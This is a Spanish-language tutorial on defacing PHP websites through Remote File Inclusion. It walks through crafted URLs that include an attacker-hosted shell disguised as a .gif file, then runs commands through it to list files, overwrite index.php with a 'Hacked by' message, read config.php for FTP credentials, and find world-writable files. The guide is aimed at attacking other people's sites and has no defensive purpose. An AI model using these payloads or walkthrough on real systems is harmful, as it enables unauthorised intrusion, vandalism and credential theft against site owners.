Deface por RFI

Como ya Explique, Esta tecnica se basa en un bug de webs programadas en PHP.
Esta tecnica nos deja meter nuestra Shell para poder ejecutar comandos Linux/Unix.

Ahora Empezemos. Un Pequeño Ejemplo imaginemonos que nos encontramos esta Web:

°º¤ø,¸¸,ø¤º°`°º¤ø,¸
www.Rario.com/index.php?seccion=Links
°º¤ø,¸¸,ø¤º°`°º¤ø,¸

Lo Primero que tenemos que hacer es ver si podemos meterle nuestra Shell, Asi:

°º¤ø,¸¸,ø¤º°`°º¤ø,¸
www.Rario.com/index.php?seccion=http://yo.tuhost.com/Rario/shell.gif?&cmd=ls
°º¤ø,¸¸,ø¤º°`°º¤ø,¸

Dejenme Explicarles como Funciona:

www.Rario.com
Esta es la web Vulnerable
---
Index.php? Tambien conocido como Main. php?, Home.php? etc...
Esta es la Pagina Principal
---
seccion=
Variable en PHP para ir a alguna Seccion especial tambien puede cambiar
---
http://yo.tuhost.com/Rario/yo.gif
Url de Nuestra Shell, si no Tienes tu Host Abre uno (Yo recomiendo Miarroba)
Siempre ponle una extencion diferente, que no sea Php, Html etc... para mas
seguridad pone extencion Gif, Sh etc... Por que sino la estariamos corriendo
en Nuestra maquina.
---
?&cmd=
Esto le pondremos despues de nuestra URL con la shell para ejecutar un Comando.
---
LS
Este es el Comando de Linux a ejecutar,nos enlista los archivos del servidor

Al introducir nuestra shell con exito no debera salir una tabla con datos del Servidor.
Tambien te Dice si tienes permiso de Escritura si los tienes ya tienes tu deface.

Un deface simple es Ponerle un "Echo Hacked by Rario"
Si en la tabla de tu shell te aparece la pagina principal asi:

°º¤ø,¸¸,ø¤º°`°º¤ø,¸
www/home/rario
°º¤ø,¸¸,ø¤º°`°º¤ø,¸

Solo tenemos que hacer esto:

°º¤ø,¸¸,ø¤º°`°º¤ø,¸
www.Rario.com/index.php?seccion=http://yo.tuhost.com/Rario/shell.gif?&cmd=cd/www/home/Rario/;echo Hacked by Rario>index.php
°º¤ø,¸¸,ø¤º°`°º¤ø,¸

Al introducir esta direccion esto es lo que Pasa:

CD
Nos lleva a alguna carpeta en esta caso www/home/rario
---
;Echo
este Comando muestra en la pantalla un texto en este caso Hacked by Rario
---
>
Este Comando inserta el comando anterior a algun archivo en este caso Index.php

Tambien se podria buscar el Archivo Config.php,Ahi se encuentra la contraseña del FTP
Para hacer esto tendriamos que introducir algo asi:

°º¤ø,¸¸,ø¤º°`°º¤ø,¸
www.Rario.com/index.php?seccion=http://yo.tuhost.com/Rario/shell.gif?&cmd=cd/www/home/rario/;cat config.php
°º¤ø,¸¸,ø¤º°`°º¤ø,¸

y nos Mostrara algo asi:

Host:RarioBlog
User:Rario
Password:Blog

Con esto puedes usar un cliente FTP y subir tu index mejorado.

Pero si no tuvieramos permiso de escritura,pasaremos a buscar archivos y carpetas que tengan permisos.

Para Buscar dichos archivos se introduciria algo asi:

°º¤ø,¸¸,ø¤º°`°º¤ø,¸
www.rario.com/index.php?seccion=http://yo.tuhost.com/rario/shell.gif?&Cmd=cd/www/home/rario/;find -perm 777
°º¤ø,¸¸,ø¤º°`°º¤ø,¸

Find
El comando Find pues tal como dice (en ingles) sirve para Buscar
---
-perm 777
Significa Permisos

En pocas palabras te enlistara todos los archivos con permiso para que los Defaces.

Por Ultimo, Si al meter tu shell te sale un error quiere decir que la web tiene bugs en su PHP, consiguete un RPVS para buscar vulnerabilidades en esa Web.

Si al introducir tu shell te lleva a la pagina principal es que esta bien actualizada asi que empieza a buscar otra web =D.